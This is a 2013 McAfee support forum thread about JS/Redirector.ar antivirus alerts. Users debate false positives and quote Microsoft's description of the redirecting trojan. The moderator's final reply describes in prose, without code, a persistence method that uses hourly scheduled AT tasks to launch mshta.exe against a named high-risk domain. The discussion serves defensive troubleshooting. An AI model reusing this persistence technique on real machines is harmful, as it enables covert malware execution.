Skip navigation
McAfee Secure sites help keep you safe from identity theft, credit card fraud, spyware, spam, viruses and online scams
2536 Views 11 Replies Latest reply: May 14, 2013 9:25 PM by rmetzger RSS 1 2 Previous Next
dans Newcomer 35 posts since
Oct 18, 2012
Currently Being Moderated

Apr 30, 2013 1:00 PM

JS/Redirector.ar how to defend against or False Positives?

Reviewing my top threat events I have a large number of JS/redirector.ar alerts. Upon review, I strongly feel these are false positives. Why? Because sone of the threat target paths are files from are our own websites and from my knowledge have no reports of dropping malware on anyones PC. We have an outbound web proxy as well, which would likely have alerted us to any malicous content or websites. So why do I have so many JS/redirector.ar alerts? How can I stop them from a different network layer vs. on the client endpoint? I have web proxies, which I expect should defend against this attack vector, so why aren't they or is McAfee filling my log books with false positives.....likely he case, so what's the best way to stop the noise, without losing security?

 

An example threat target path is

temporary internet files\content.ie5\adcdf\169comparison[1].htm

  • jp75 Newcomer 3 posts since
    May 3, 2013

    I'm receiving similar alerts.  Were you able to find a resolution?

  • jp75 Newcomer 3 posts since
    May 3, 2013

    That's what I feared.  Unfortunately I can't find much, if anything, about this alert.  Full scans of "infected" machines do not find anything else. 

     

    Well...good luck and I hope you find the cause.

  • schgu Newcomer 3 posts since
    Feb 4, 2005

    Same here... found out that ALL of these alerts were False/Positives. Depends on redirection parameters of Java-Scripts on Web-Site. Seems like a "generic" pattern. But unfortunaltely no way to avoid that..This has to be corrected by McAfee.

     

    Greetings schgu

  • Hayton Volunteer Moderator 4,590 posts since
    Sep 27, 2010

    This Redirector is also being detected by McAfee on some home PCs. A poster has noted that in his Security History the detection is being made once an hour, consistently.

     

    If this is not a false positive that hourly detection might be significant, but I don't know if this is because the AV software is making an hourly check (seems unlikely) or something is creating the file once an hour.

     

    That detected file has the name "LoginCA<xxxxnn>.htm" which looks like a login screen for some website. The location is in a hidden folder (Network Service\Local Settings\Temporary Internet Files\Content.IE5).

     

    Can posters to this thread check their event logs to see whether there is a similar pattern of detection at fixed intervals?


    Volunteer Moderator  Leeds, UK
    No PM's please
  • schgu Newcomer 3 posts since
    Feb 4, 2005

    Hourly detection seems rather suspicous to me. This might be a truly infection where malware tries to connect to command-server. Delete temporary internet files first - if dectection contines (without surfing on the internet) then do a full-scan with av.

     

    I'am getting these alerts while surfing on different (harmless) sites only.

     

    Greets

     

    Nachricht geändert durch schgu on 10.05.13 15:36:03 MESZ
  • Hayton Volunteer Moderator 4,590 posts since
    Sep 27, 2010

    This is what Microsoft has to say about Trojan JS/Redirector.ar : I'm assuming that McAfee and Microsoft are referring to the same Redirector.

     

    http://www.microsoft.com/security/portal/threat/encyclopedia/entry.aspx?Name=Tro jan%3AJS%2FRedirector.AR

     

    Trojan:JS/Redirector.AR is a malicious JavaScript inserted into Web pages by an attacker. The trojan script checks for the presence of Adobe Flash Player and Microsoft Office Web Components, redirecting the user to other Web pages that may exploit the vulnerabilities of Adobe Flash Player and MS Office Web Components.


    When a Web page containing the script is viewed using a vulnerable computer, exploits used in the JavaScript redirect the Web browser within IFrames to other pages, potentially downloading or executing other malware.

     

    So yes, it's possible the poster in the thread in the Consumer section is seeing the effects of downloaded malware. A Full McAfee scan found nothing, but the hourly quaranting of the file noted above is continuing.


    Volunteer Moderator  Leeds, UK
    No PM's please
  • schgu Newcomer 3 posts since
    Feb 4, 2005

    this is correct. Microsoft Encyclopedia entry has been updated april 2011. this is, in my case strong indication for false/positive. today there are some dozens of newer variations from JS/Redirector in the field. Why should this "old-chap" appear so often during the last 4-5 weeks ?

     

    In your case seems to be a different story. Why not try a different scanner to double-check ?

     

    For example this one (or similar)

    http://www.malwarebytes.org/products/mbar/

  • Hayton Volunteer Moderator 4,590 posts since
    Sep 27, 2010

    The poster in the Consumer section found a batch of ATnn tasks in Task Scheduler, one per hour of the day. That accounts for McAfee's hourly detection of the Redirector, and also why scans with McAfee and Malwarebytes failed to find anything. Each hourly task created an instance of mshta.exe and tried to connect to global-network-solution.com, a site rated High Risk by TrustedSource (and Red rated by SiteAdvisor, so don't try to go there). The interesting part is why, for a Red site, the connection was allowed, as it must have been.

     

    Still, the relevant information here is Task Scheduler. Perhaps everyone seeing this detection should check their scheduled tasks. And Googling shows that this technique (with the hourly AT.. tasks, and mshta.exe) has been used successfully for years. Simple, but effective.


    Volunteer Moderator  Leeds, UK
    No PM's please
1 2 Previous Next

More Like This

  • Retrieving data ...

Bookmarked By (0)

Legend

  • Correct Answers - 5 points
  • Helpful Answers - 3 points